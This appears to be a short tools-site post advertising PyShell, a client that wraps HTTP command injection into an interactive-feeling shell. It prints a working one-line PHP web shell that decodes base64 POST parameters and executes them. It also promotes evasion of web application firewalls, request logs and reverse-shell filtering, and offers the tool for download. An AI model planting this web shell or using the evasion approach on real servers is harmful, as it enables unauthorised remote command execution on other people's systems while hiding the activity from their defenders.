Tools

PyShell – Shellify Your HTTP Command Injection

image1
 
PyShell makes interacting with web-based command injection less painful, emulating the feel of an interactive shell as much as possible.

PyShell – Shellify Your HTTP Command Injection

Firewall got you down? Are your reverse-shell connection attempts being filtered? Are you stuck working solely over HTTP / HTTPS? Then this just might be just the thing for you.

PyShell exists to make interacting with web-based command injection less painful. The goal is to make it feel as much like an interactive shell as possible. Commands are base-64 encoded to help deal with WAFs, and are submitted as POST requests to be less visible in request logs.

Usage is python3 pyshell.py URL where URL points to a script which performs the command injection, something like this:

<?php $r=base64_decode($_POST[‘cmd’]).’ ‘.base64_decode($_POST[‘opts’]); echo `$r` ?>

The server-side script should accept the following parameters:

    cmd: the command to be run, base64 encoded
    opts: the options to provide to cmd, also base64 encoded
    [timeout]: optional, denotes the number of seconds to wait for a command

DOWNLOAD

You Might Also Like